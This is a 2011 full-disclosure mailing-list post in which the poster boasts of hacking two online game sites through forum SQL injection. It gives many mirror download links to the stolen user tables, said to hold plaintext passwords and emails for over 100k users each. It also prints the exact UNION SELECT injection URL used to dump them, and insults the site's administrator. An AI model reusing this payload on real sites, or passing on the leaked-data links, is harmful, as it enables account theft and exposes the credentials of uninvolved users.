[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] bcwars.com & pokerrpg.com hacked 200k Email and
From:       Bob Smith <bobbyhadababyitsaboy () googlemail ! com>
Date:       2011-03-30 22:29:30
Message-ID: AANLkTimNqRyLom_AMbcszVeC50+0VQnxkV3SD=q1NJmY () mail ! gmail ! com
[Download RAW message or body]

Nother game, nother haxed db

2 games
pokerrpg.com
and
bcwars.com

over 100k users each

admin used plaintext passwords

how dumb

got in thru sql injection in the forum

tried helping the admin fix but dumbass Dadfish kept being a dick so
this disclosure is because of him

bcwars
http://bit.ly/hD6bEE
http://rapidshare.com/files/455184098/tblUsers-bc.sql.zip
http://www.megaupload.com/?d=P4B30IVR
http://depositfiles.com/de/files/u7unbc4vk
http://hotfile.com/dl/112676282/bcd44f5/tblUsers-bc.sql.zip.html
http://www.zshare.net/download/884416713e3e2044/
http://uploading.com/files/3e13f3be/tblUsers-bc.sql.zip/

pokerrpg
http://bit.ly/hgCGJx
http://rapidshare.com/files/455184096/tblUsers.sql-poker.zip
http://www.megaupload.com/?d=T41NF4SV
http://depositfiles.com/de/files/8qgnt9gll
http://hotfile.com/dl/112676281/bea47ec/tblUsers.sql-poker.zip.html
http://www.zshare.net/download/88441668eff79c3a/
http://uploading.com/files/542e651f/tblUsers.sql-poker.zip

injection was
http://bcwars.com/forum/category/-3' union select
concat(id,'::::',username,':::::::',password,':::::::',email) from
tblUsers-- -

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]